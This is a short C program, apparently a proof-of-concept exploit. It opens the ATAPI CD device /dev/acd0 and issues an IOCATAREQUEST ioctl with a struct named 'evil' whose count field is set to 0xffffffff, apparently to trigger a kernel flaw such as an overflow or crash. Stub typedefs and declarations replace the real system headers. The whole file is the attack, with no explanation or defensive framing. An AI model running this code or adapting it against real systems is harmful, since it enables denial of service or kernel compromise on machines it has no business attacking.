
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct ata_ioc_requestz {int count; } ;


 int IOCATAREQUEST ;
 int O_RDONLY ;
 int ioctl (int,int ,struct ata_ioc_requestz*) ;
 int open (char*,int ) ;

int main() {

struct ata_ioc_requestz evil;
int fd;

evil.count = 0xffffffff;
fd = open("/dev/acd0", O_RDONLY);

ioctl(fd, IOCATAREQUEST, &evil);


return 0;
}
